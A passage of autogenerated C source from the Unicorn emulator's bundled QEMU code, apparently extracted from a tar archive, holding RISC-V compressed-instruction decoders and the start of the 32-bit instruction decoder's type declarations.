bool trans_fld(DisasContext *ctx, arg_fld *a); typedef arg_i arg_lw; static bool trans_lw(DisasContext *ctx, arg_lw *a); typedef arg_s arg_fsd; static bool trans_fsd(DisasContext *ctx, arg_fsd *a); typedef arg_s arg_sw; static bool trans_sw(DisasContext *ctx, arg_sw *a); typedef arg_u arg_lui; static bool trans_lui(DisasContext *ctx, arg_lui *a); typedef arg_shift arg_srli; static bool trans_srli(DisasContext *ctx, arg_srli *a); typedef arg_shift arg_srai; static bool trans_srai(DisasContext *ctx, arg_srai *a); typedef arg_i arg_andi; static bool trans_andi(DisasContext *ctx, arg_andi *a); typedef arg_r arg_sub; static bool trans_sub(DisasContext *ctx, arg_sub *a); typedef arg_r arg_xor; static bool trans_xor(DisasContext *ctx, arg_xor *a); typedef arg_r arg_or; static bool trans_or(DisasContext *ctx, arg_or *a); typedef arg_r arg_and; static bool trans_and(DisasContext *ctx, arg_and *a); typedef arg_j arg_jal; static bool trans_jal(DisasContext *ctx, arg_jal *a); typedef arg_b arg_beq; static bool trans_beq(DisasContext *ctx, arg_beq *a); typedef arg_b arg_bne; static bool trans_bne(DisasContext *ctx, arg_bne *a); typedef arg_shift arg_slli; static bool trans_slli(DisasContext *ctx, arg_slli *a); typedef arg_i arg_jalr; static bool trans_jalr(DisasContext *ctx, arg_jalr *a); typedef arg_empty arg_ebreak; static bool trans_ebreak(DisasContext *ctx, arg_ebreak *a); typedef arg_r arg_add; static bool trans_add(DisasContext *ctx, arg_add *a); typedef arg_i arg_flw; static bool trans_flw(DisasContext *ctx, arg_flw *a); typedef arg_s arg_fsw; static bool trans_fsw(DisasContext *ctx, arg_fsw *a); #ifdef CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE # pragma GCC diagnostic pop #endif static void decode_insn16_extract_c_addi16sp(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_4(ctx, deposit32(deposit32(deposit32(deposit32(extract32(insn, 6, 1), 1, 31, extract32(insn, 2, 1)), 2, 30, extract32(insn, 5, 1)), 3, 29, extract32(insn, 3, 2)), 5, 27, sextract32(insn, 12, 1))); a->rs1 = 2; a->rd = 2; } static void decode_insn16_extract_c_addi4spn(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_2(ctx, deposit32(deposit32(deposit32(extract32(insn, 6, 1), 1, 31, extract32(insn, 5, 1)), 2, 30, extract32(insn, 11, 2)), 4, 28, extract32(insn, 7, 4))); a->rs1 = 2; a->rd = ex_rvc_register(ctx, extract32(insn, 2, 3)); } static void decode_insn16_extract_c_andi(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = deposit32(extract32(insn, 2, 5), 5, 27, sextract32(insn, 12, 1)); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rd = ex_rvc_register(ctx, extract32(insn, 7, 3)); } static void decode_insn16_extract_c_jalr(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = 0; a->rs1 = extract32(insn, 7, 5); } static void decode_insn16_extract_c_ldsp(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_3(ctx, deposit32(deposit32(extract32(insn, 5, 2), 2, 30, extract32(insn, 12, 1)), 3, 29, extract32(insn, 2, 3))); a->rs1 = 2; a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_c_li(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = deposit32(extract32(insn, 2, 5), 5, 27, sextract32(insn, 12, 1)); a->rs1 = 0; a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_c_lui(DisasContext *ctx, arg_u *a, uint16_t insn) { a->imm = ex_shift_12(ctx, deposit32(extract32(insn, 2, 5), 5, 27, sextract32(insn, 12, 1))); a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_c_lwsp(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_2(ctx, deposit32(deposit32(extract32(insn, 4, 3), 3, 29, extract32(insn, 12, 1)), 4, 28, extract32(insn, 2, 2))); a->rs1 = 2; a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_c_mv(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = 0; a->rs1 = extract32(insn, 2, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_c_sdsp(DisasContext *ctx, arg_s *a, uint16_t insn) { a->imm = ex_shift_3(ctx, deposit32(extract32(insn, 10, 3), 3, 29, extract32(insn, 7, 3))); a->rs1 = 2; a->rs2 = extract32(insn, 2, 5); } static void decode_insn16_extract_c_shift(DisasContext *ctx, arg_shift *a, uint16_t insn) { a->rd = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->shamt = ex_rvc_shifti(ctx, deposit32(extract32(insn, 2, 5), 5, 27, extract32(insn, 12, 1))); } static void decode_insn16_extract_c_shift2(DisasContext *ctx, arg_shift *a, uint16_t insn) { a->rd = extract32(insn, 7, 5); a->rs1 = extract32(insn, 7, 5); a->shamt = ex_rvc_shifti(ctx, deposit32(extract32(insn, 2, 5), 5, 27, extract32(insn, 12, 1))); } static void decode_insn16_extract_c_swsp(DisasContext *ctx, arg_s *a, uint16_t insn) { a->imm = ex_shift_2(ctx, deposit32(extract32(insn, 9, 4), 4, 28, extract32(insn, 7, 2))); a->rs1 = 2; a->rs2 = extract32(insn, 2, 5); } static void decode_insn16_extract_cb_z(DisasContext *ctx, arg_b *a, uint16_t insn) { a->imm = ex_shift_1(ctx, deposit32(deposit32(deposit32(deposit32(extract32(insn, 3, 2), 2, 30, extract32(insn, 10, 2)), 4, 28, extract32(insn, 2, 1)), 5, 27, extract32(insn, 5, 2)), 7, 25, sextract32(insn, 12, 1))); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rs2 = 0; } static void decode_insn16_extract_ci(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = deposit32(extract32(insn, 2, 5), 5, 27, sextract32(insn, 12, 1)); a->rs1 = extract32(insn, 7, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_cj(DisasContext *ctx, arg_j *a, uint16_t insn) { a->imm = ex_shift_1(ctx, deposit32(deposit32(deposit32(deposit32(deposit32(deposit32(deposit32(extract32(insn, 3, 3), 3, 29, extract32(insn, 11, 1)), 4, 28, extract32(insn, 2, 1)), 5, 27, extract32(insn, 7, 1)), 6, 26, extract32(insn, 6, 1)), 7, 25, extract32(insn, 9, 2)), 9, 23, extract32(insn, 8, 1)), 10, 22, sextract32(insn, 12, 1))); } static void decode_insn16_extract_cl_d(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_3(ctx, deposit32(extract32(insn, 10, 3), 3, 29, extract32(insn, 5, 2))); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rd = ex_rvc_register(ctx, extract32(insn, 2, 3)); } static void decode_insn16_extract_cl_w(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = ex_shift_2(ctx, deposit32(deposit32(extract32(insn, 6, 1), 1, 31, extract32(insn, 10, 3)), 4, 28, extract32(insn, 5, 1))); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rd = ex_rvc_register(ctx, extract32(insn, 2, 3)); } static void decode_insn16_extract_cr(DisasContext *ctx, arg_r *a, uint16_t insn) { a->rs2 = extract32(insn, 2, 5); a->rs1 = extract32(insn, 7, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn16_extract_cs_2(DisasContext *ctx, arg_r *a, uint16_t insn) { a->rs2 = ex_rvc_register(ctx, extract32(insn, 2, 3)); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rd = ex_rvc_register(ctx, extract32(insn, 7, 3)); } static void decode_insn16_extract_cs_d(DisasContext *ctx, arg_s *a, uint16_t insn) { a->imm = ex_shift_3(ctx, deposit32(extract32(insn, 10, 3), 3, 29, extract32(insn, 5, 2))); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rs2 = ex_rvc_register(ctx, extract32(insn, 2, 3)); } static void decode_insn16_extract_cs_w(DisasContext *ctx, arg_s *a, uint16_t insn) { a->imm = ex_shift_2(ctx, deposit32(deposit32(extract32(insn, 6, 1), 1, 31, extract32(insn, 10, 3)), 4, 28, extract32(insn, 5, 1))); a->rs1 = ex_rvc_register(ctx, extract32(insn, 7, 3)); a->rs2 = ex_rvc_register(ctx, extract32(insn, 2, 3)); } static void decode_insn16_extract_decode_insn16_Fmt_22(DisasContext *ctx, arg_empty *a, uint16_t insn) { } static bool decode_insn16(DisasContext *ctx, uint16_t insn) { union { arg_b f_b; arg_empty f_empty; arg_i f_i; arg_j f_j; arg_r f_r; arg_s f_s; arg_shift f_shift; arg_u f_u; } u; switch (insn & 0x0000e003) { case 0x00000000: /* 000..... ......00 */ if ((insn & 0x00001fe0) == 0x00000000) { /* 00000000 000...00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:87 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); ctx->invalid = true; if (trans_illegal(ctx, &u.f_empty)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:88 */ decode_insn16_extract_c_addi4spn(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; return false; case 0x00000001: /* 000..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:96 */ decode_insn16_extract_ci(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; return false; case 0x00000002: /* 000..... ......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:115 */ decode_insn16_extract_c_shift2(ctx, &u.f_shift, insn); if (trans_slli(ctx, &u.f_shift)) return true; return false; case 0x00002000: /* 001..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:90 */ decode_insn16_extract_cl_d(ctx, &u.f_i, insn); if (trans_fld(ctx, &u.f_i)) return true; return false; case 0x00002001: /* 001..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-32.decode:24 */ decode_insn16_extract_cj(ctx, &u.f_j, insn); u.f_j.rd = 1; if (trans_jal(ctx, &u.f_j)) return true; return false; case 0x00002002: /* 001..... ......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:116 */ decode_insn16_extract_c_ldsp(ctx, &u.f_i, insn); if (trans_fld(ctx, &u.f_i)) return true; return false; case 0x00004000: /* 010..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:91 */ decode_insn16_extract_cl_w(ctx, &u.f_i, insn); if (trans_lw(ctx, &u.f_i)) return true; return false; case 0x00004001: /* 010..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:97 */ decode_insn16_extract_c_li(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; return false; case 0x00004002: /* 010..... ......10 */ if ((insn & 0x00000f80) == 0x00000000) { /* 010.0000 0.....10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:118 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); if (trans_illegal(ctx, &u.f_empty)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:119 */ decode_insn16_extract_c_lwsp(ctx, &u.f_i, insn); if (trans_lw(ctx, &u.f_i)) return true; return false; case 0x00006000: /* 011..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-32.decode:20 */ decode_insn16_extract_cl_w(ctx, &u.f_i, insn); if (trans_flw(ctx, &u.f_i)) return true; return false; case 0x00006001: /* 011..... ......01 */ if ((insn & 0x0000107c) == 0x00000000) { /* 0110.... .0000001 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:99 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); if (trans_illegal(ctx, &u.f_empty)) return true; } if ((insn & 0x00000f80) == 0x00000100) { /* 011.0001 0.....01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:100 */ decode_insn16_extract_c_addi16sp(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:101 */ decode_insn16_extract_c_lui(ctx, &u.f_u, insn); if (trans_lui(ctx, &u.f_u)) return true; return false; case 0x00006002: /* 011..... ......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-32.decode:27 */ decode_insn16_extract_c_lwsp(ctx, &u.f_i, insn); if (trans_flw(ctx, &u.f_i)) return true; return false; case 0x00008001: /* 100..... ......01 */ switch ((insn >> 10) & 0x3) { case 0x0: /* 100.00.. ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:103 */ decode_insn16_extract_c_shift(ctx, &u.f_shift, insn); if (trans_srli(ctx, &u.f_shift)) return true; return false; case 0x1: /* 100.01.. ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:104 */ decode_insn16_extract_c_shift(ctx, &u.f_shift, insn); if (trans_srai(ctx, &u.f_shift)) return true; return false; case 0x2: /* 100.10.. ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:105 */ decode_insn16_extract_c_andi(ctx, &u.f_i, insn); if (trans_andi(ctx, &u.f_i)) return true; return false; case 0x3: /* 100.11.. ......01 */ decode_insn16_extract_cs_2(ctx, &u.f_r, insn); switch (insn & 0x00001060) { case 0x00000000: /* 100011.. .00...01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:106 */ if (trans_sub(ctx, &u.f_r)) return true; return false; case 0x00000020: /* 100011.. .01...01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:107 */ if (trans_xor(ctx, &u.f_r)) return true; return false; case 0x00000040: /* 100011.. .10...01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:108 */ if (trans_or(ctx, &u.f_r)) return true; return false; case 0x00000060: /* 100011.. .11...01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:109 */ if (trans_and(ctx, &u.f_r)) return true; return false; } return false; } return false; case 0x00008002: /* 100..... ......10 */ switch ((insn >> 12) & 0x1) { case 0x0: /* 1000.... ......10 */ if ((insn & 0x00000ffc) == 0x00000000) { /* 10000000 00000010 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:122 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); if (trans_illegal(ctx, &u.f_empty)) return true; } if ((insn & 0x0000007c) == 0x00000000) { /* 1000.... .0000010 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:123 */ decode_insn16_extract_c_jalr(ctx, &u.f_i, insn); u.f_i.rd = 0; if (trans_jalr(ctx, &u.f_i)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:124 */ decode_insn16_extract_c_mv(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; return false; case 0x1: /* 1001.... ......10 */ if ((insn & 0x00000ffc) == 0x00000000) { /* 10010000 00000010 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:127 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); if (trans_ebreak(ctx, &u.f_empty)) return true; } if ((insn & 0x0000007c) == 0x00000000) { /* 1001.... .0000010 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:128 */ decode_insn16_extract_c_jalr(ctx, &u.f_i, insn); u.f_i.rd = 1; if (trans_jalr(ctx, &u.f_i)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:129 */ decode_insn16_extract_cr(ctx, &u.f_r, insn); if (trans_add(ctx, &u.f_r)) return true; return false; } return false; case 0x0000a000: /* 101..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:92 */ decode_insn16_extract_cs_d(ctx, &u.f_s, insn); if (trans_fsd(ctx, &u.f_s)) return true; return false; case 0x0000a001: /* 101..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:110 */ decode_insn16_extract_cj(ctx, &u.f_j, insn); u.f_j.rd = 0; if (trans_jal(ctx, &u.f_j)) return true; return false; case 0x0000a002: /* 101..... ......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:131 */ decode_insn16_extract_c_sdsp(ctx, &u.f_s, insn); if (trans_fsd(ctx, &u.f_s)) return true; return false; case 0x0000c000: /* 110..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:93 */ decode_insn16_extract_cs_w(ctx, &u.f_s, insn); if (trans_sw(ctx, &u.f_s)) return true; return false; case 0x0000c001: /* 110..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:111 */ decode_insn16_extract_cb_z(ctx, &u.f_b, insn); if (trans_beq(ctx, &u.f_b)) return true; return false; case 0x0000c002: /* 110..... ......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:132 */ decode_insn16_extract_c_swsp(ctx, &u.f_s, insn); if (trans_sw(ctx, &u.f_s)) return true; return false; case 0x0000e000: /* 111..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-32.decode:21 */ decode_insn16_extract_cs_w(ctx, &u.f_s, insn); if (trans_fsw(ctx, &u.f_s)) return true; return false; case 0x0000e001: /* 111..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:112 */ decode_insn16_extract_cb_z(ctx, &u.f_b, insn); if (trans_bne(ctx, &u.f_b)) return true; return false; case 0x0000e002: /* 111..... ......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-32.decode:28 */ decode_insn16_extract_c_swsp(ctx, &u.f_s, insn); if (trans_fsw(ctx, &u.f_s)) return true; return false; } return false; } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/riscv32/decode_insn32.inc.c�����������������������������������������0000664�0000000�0000000�00000171300�14675241067�0023417�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* This file is autogenerated by scripts/decodetree.py. */ typedef struct { int aq; int rd; int rl; int rs1; int rs2; } arg_atomic; typedef struct { int imm; int rs1; int rs2; } arg_b; typedef struct { int rd; int rm; int rs1; int rs2; int rs3; } arg_decode_insn3210; typedef struct { int rd; int rm; int rs1; int rs2; } arg_decode_insn3211; typedef struct { int rd; int rm; int rs1; } arg_decode_insn3212; typedef struct { int rd; int rs1; } arg_decode_insn3213; typedef struct { int rs1; int rs2; } arg_decode_insn3214; typedef struct { int rs1; } arg_decode_insn3215; typedef struct { int pred; int succ; } arg_decode_insn3216; typedef struct { int csr; int rd; int rs1; } arg_decode_insn329; typedef struct { #ifdef _MSC_VER int dummy; // MSVC does not allow empty struct #endif } arg_empty; typedef struct { int imm; int rd; int rs1; } arg_i; typedef struct { int imm; int rd; } arg_j; typedef struct { int rd; int rs1; int rs2; } arg_r; typedef struct { int imm; int rs1; int rs2; } arg_s; typedef struct { int rd; int rs1; int shamt; } arg_shift; typedef struct { int imm; int rd; } arg_u; typedef arg_empty arg_ecall; static bool trans_ecall(DisasContext *ctx, arg_ecall *a); typedef arg_empty arg_ebreak; static bool trans_ebreak(DisasContext *ctx, arg_ebreak *a); typedef arg_empty arg_uret; static bool trans_uret(DisasContext *ctx, arg_uret *a); typedef arg_empty arg_sret; static bool trans_sret(DisasContext *ctx, arg_sret *a); typedef arg_empty arg_mret; static bool trans_mret(DisasContext *ctx, arg_mret *a); typedef arg_empty arg_wfi; static bool trans_wfi(DisasContext *ctx, arg_wfi *a); typedef arg_decode_insn3214 arg_hfence_gvma; static bool trans_hfence_gvma(DisasContext *ctx, arg_hfence_gvma *a); typedef arg_decode_insn3214 arg_hfence_bvma; static bool trans_hfence_bvma(DisasContext *ctx, arg_hfence_bvma *a); typedef arg_decode_insn3214 arg_sfence_vma; static bool trans_sfence_vma(DisasContext *ctx, arg_sfence_vma *a); typedef arg_decode_insn3215 arg_sfence_vm; static bool trans_sfence_vm(DisasContext *ctx, arg_sfence_vm *a); typedef arg_u arg_lui; static bool trans_lui(DisasContext *ctx, arg_lui *a); typedef arg_u arg_auipc; static bool trans_auipc(DisasContext *ctx, arg_auipc *a); typedef arg_j arg_jal; static bool trans_jal(DisasContext *ctx, arg_jal *a); typedef arg_i arg_jalr; static bool trans_jalr(DisasContext *ctx, arg_jalr *a); typedef arg_b arg_beq; static bool trans_beq(DisasContext *ctx, arg_beq *a); typedef arg_b arg_bne; static bool trans_bne(DisasContext *ctx, arg_bne *a); typedef arg_b arg_blt; static bool trans_blt(DisasContext *ctx, arg_blt *a); typedef arg_b arg_bge; static bool trans_bge(DisasContext *ctx, arg_bge *a); typedef arg_b arg_bltu; static bool trans_bltu(DisasContext *ctx, arg_bltu *a); typedef arg_b arg_bgeu; static bool trans_bgeu(DisasContext *ctx, arg_bgeu *a); typedef arg_i arg_lb; static bool trans_lb(DisasContext *ctx, arg_lb *a); typedef arg_i arg_lh; static bool trans_lh(DisasContext *ctx, arg_lh *a); typedef arg_i arg_lw; static bool trans_lw(DisasContext *ctx, arg_lw *a); typedef arg_i arg_lbu; static bool trans_lbu(DisasContext *ctx, arg_lbu *a); typedef arg_i arg_lhu; static bool trans_lhu(DisasContext *ctx, arg_lhu *a); typedef arg_s arg_sb; static bool trans_sb(DisasContext *ctx, arg_sb *a); typedef arg_s arg_sh; static bool trans_sh(DisasContext *ctx, arg_sh *a); typedef arg_s arg_sw; static bool trans_sw(DisasContext *ctx, arg_sw *a); typedef arg_i arg_addi; static bool trans_addi(DisasContext *ctx, arg_addi *a); typedef arg_i arg_slti; static bool trans_slti(DisasContext *ctx, arg_slti *a); typedef arg_i arg_sltiu; static bool trans_sltiu(DisasContext *ctx, arg_sltiu *a); typedef arg_i arg_xori; static bool trans_xori(DisasContext *ctx, arg_xori *a); typedef arg_i arg_ori; static bool trans_ori(DisasContext *ctx, arg_ori *a); typedef arg_i arg_andi; static bool trans_andi(DisasContext *ctx, arg_andi *a); typedef arg_shift arg_slli; static bool trans_slli(DisasContext *ctx, arg_slli *a); typedef arg_shift arg_srli; static bool trans_srli(DisasContext *ctx, arg_srli *a); typedef arg_shift arg_srai; static bool trans_srai(DisasContext *ctx, arg_srai *a); typedef arg_r arg_add; static bool trans_add(DisasContext *ctx, arg_add *a); typedef arg_r arg_sub; static bool trans_sub(DisasContext *ctx, arg_sub *a); typedef arg_r arg_sll; static bool trans_sll(DisasContext *ctx, arg_sll *a); typedef arg_r arg_slt; static bool trans_slt(DisasContext *ctx, arg_slt *a); typedef arg_r arg_sltu; static bool trans_sltu(DisasContext *ctx, arg_sltu *a); typedef arg_r arg_xor; static bool trans_xor(DisasContext *ctx, arg_xor *a); typedef arg_r arg_srl; static bool trans_srl(DisasContext *ctx, arg_srl *a); typedef arg_r arg_sra; static bool trans_sra(DisasContext *ctx, arg_sra *a); typedef arg_r arg_or; static bool trans_or(DisasContext *ctx, arg_or *a); typedef arg_r arg_and; static bool trans_and(DisasContext *ctx, arg_and *a); typedef arg_decode_insn3216 arg_fence; static bool trans_fence(DisasContext *ctx, arg_fence *a); typedef arg_empty arg_fence_i; static bool trans_fence_i(DisasContext *ctx, arg_fence_i *a); typedef arg_decode_insn329 arg_csrrw; static bool trans_csrrw(DisasContext *ctx, arg_csrrw *a); typedef arg_decode_insn329 arg_csrrs; static bool trans_csrrs(DisasContext *ctx, arg_csrrs *a); typedef arg_decode_insn329 arg_csrrc; static bool trans_csrrc(DisasContext *ctx, arg_csrrc *a); typedef arg_decode_insn329 arg_csrrwi; static bool trans_csrrwi(DisasContext *ctx, arg_csrrwi *a); typedef arg_decode_insn329 arg_csrrsi; static bool trans_csrrsi(DisasContext *ctx, arg_csrrsi *a); typedef arg_decode_insn329 arg_csrrci; static bool trans_csrrci(DisasContext *ctx, arg_csrrci *a); typedef arg_r arg_mul; static bool trans_mul(DisasContext *ctx, arg_mul *a); typedef arg_r arg_mulh; static bool trans_mulh(DisasContext *ctx, arg_mulh *a); typedef arg_r arg_mulhsu; static bool trans_mulhsu(DisasContext *ctx, arg_mulhsu *a); typedef arg_r arg_mulhu; static bool trans_mulhu(DisasContext *ctx, arg_mulhu *a); typedef arg_r arg_div; static bool trans_div(DisasContext *ctx, arg_div *a); typedef arg_r arg_divu; static bool trans_divu(DisasContext *ctx, arg_divu *a); typedef arg_r arg_rem; static bool trans_rem(DisasContext *ctx, arg_rem *a); typedef arg_r arg_remu; static bool trans_remu(DisasContext *ctx, arg_remu *a); typedef arg_atomic arg_lr_w; static bool trans_lr_w(DisasContext *ctx, arg_lr_w *a); typedef arg_atomic arg_sc_w; static bool trans_sc_w(DisasContext *ctx, arg_sc_w *a); typedef arg_atomic arg_amoswap_w; static bool trans_amoswap_w(DisasContext *ctx, arg_amoswap_w *a); typedef arg_atomic arg_amoadd_w; static bool trans_amoadd_w(DisasContext *ctx, arg_amoadd_w *a); typedef arg_atomic arg_amoxor_w; static bool trans_amoxor_w(DisasContext *ctx, arg_amoxor_w *a); typedef arg_atomic arg_amoand_w; static bool trans_amoand_w(DisasContext *ctx, arg_amoand_w *a); typedef arg_atomic arg_amoor_w; static bool trans_amoor_w(DisasContext *ctx, arg_amoor_w *a); typedef arg_atomic arg_amomin_w; static bool trans_amomin_w(DisasContext *ctx, arg_amomin_w *a); typedef arg_atomic arg_amomax_w; static bool trans_amomax_w(DisasContext *ctx, arg_amomax_w *a); typedef arg_atomic arg_amominu_w; static bool trans_amominu_w(DisasContext *ctx, arg_amominu_w *a); typedef arg_atomic arg_amomaxu_w; static bool trans_amomaxu_w(DisasContext *ctx, arg_amomaxu_w *a); typedef arg_i arg_flw; static bool trans_flw(DisasContext *ctx, arg_flw *a); typedef arg_s arg_fsw; static bool trans_fsw(DisasContext *ctx, arg_fsw *a); typedef arg_decode_insn3210 arg_fmadd_s; static bool trans_fmadd_s(DisasContext *ctx, arg_fmadd_s *a); typedef arg_decode_insn3210 arg_fmsub_s; static bool trans_fmsub_s(DisasContext *ctx, arg_fmsub_s *a); typedef arg_decode_insn3210 arg_fnmsub_s; static bool trans_fnmsub_s(DisasContext *ctx, arg_fnmsub_s *a); typedef arg_decode_insn3210 arg_fnmadd_s; static bool trans_fnmadd_s(DisasContext *ctx, arg_fnmadd_s *a); typedef arg_decode_insn3211 arg_fadd_s; static bool trans_fadd_s(DisasContext *ctx, arg_fadd_s *a); typedef arg_decode_insn3211 arg_fsub_s; static bool trans_fsub_s(DisasContext *ctx, arg_fsub_s *a); typedef arg_decode_insn3211 arg_fmul_s; static bool trans_fmul_s(DisasContext *ctx, arg_fmul_s *a); typedef arg_decode_insn3211 arg_fdiv_s; static bool trans_fdiv_s(DisasContext *ctx, arg_fdiv_s *a); typedef arg_decode_insn3212 arg_fsqrt_s; static bool trans_fsqrt_s(DisasContext *ctx, arg_fsqrt_s *a); typedef arg_r arg_fsgnj_s; static bool trans_fsgnj_s(DisasContext *ctx, arg_fsgnj_s *a); typedef arg_r arg_fsgnjn_s; static bool trans_fsgnjn_s(DisasContext *ctx, arg_fsgnjn_s *a); typedef arg_r arg_fsgnjx_s; static bool trans_fsgnjx_s(DisasContext *ctx, arg_fsgnjx_s *a); typedef arg_r arg_fmin_s; static bool trans_fmin_s(DisasContext *ctx, arg_fmin_s *a); typedef arg_r arg_fmax_s; static bool trans_fmax_s(DisasContext *ctx, arg_fmax_s *a); typedef arg_decode_insn3212 arg_fcvt_w_s; static bool trans_fcvt_w_s(DisasContext *ctx, arg_fcvt_w_s *a); typedef arg_decode_insn3212 arg_fcvt_wu_s; static bool trans_fcvt_wu_s(DisasContext *ctx, arg_fcvt_wu_s *a); typedef arg_decode_insn3213 arg_fmv_x_w; static bool trans_fmv_x_w(DisasContext *ctx, arg_fmv_x_w *a); typedef arg_r arg_feq_s; static bool trans_feq_s(DisasContext *ctx, arg_feq_s *a); typedef arg_r arg_flt_s; static bool trans_flt_s(DisasContext *ctx, arg_flt_s *a); typedef arg_r arg_fle_s; static bool trans_fle_s(DisasContext *ctx, arg_fle_s *a); typedef arg_decode_insn3213 arg_fclass_s; static bool trans_fclass_s(DisasContext *ctx, arg_fclass_s *a); typedef arg_decode_insn3212 arg_fcvt_s_w; static bool trans_fcvt_s_w(DisasContext *ctx, arg_fcvt_s_w *a); typedef arg_decode_insn3212 arg_fcvt_s_wu; static bool trans_fcvt_s_wu(DisasContext *ctx, arg_fcvt_s_wu *a); typedef arg_decode_insn3213 arg_fmv_w_x; static bool trans_fmv_w_x(DisasContext *ctx, arg_fmv_w_x *a); typedef arg_i arg_fld; static bool trans_fld(DisasContext *ctx, arg_fld *a); typedef arg_s arg_fsd; static bool trans_fsd(DisasContext *ctx, arg_fsd *a); typedef arg_decode_insn3210 arg_fmadd_d; static bool trans_fmadd_d(DisasContext *ctx, arg_fmadd_d *a); typedef arg_decode_insn3210 